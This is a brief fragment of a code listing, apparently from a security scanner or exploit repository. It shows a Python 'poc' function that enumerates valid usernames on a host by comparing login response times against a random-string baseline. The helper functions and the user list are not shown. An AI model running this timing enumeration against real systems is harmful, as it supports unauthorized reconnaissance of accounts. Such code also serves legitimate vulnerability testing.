(host)
| 38 | |
| 39 | |
| 40 | def poc(host): |
| 41 | ans = [] |
| 42 | base_time = getResponseTime(randomString(), host) |
| 43 | for user in users: |
| 44 | if getResponseTime(user, host) - base_time > delay: |
| 45 | ans.append(user) |
| 46 | return ans if ans.__len__() else False |
nothing calls this directly
no test coverage detected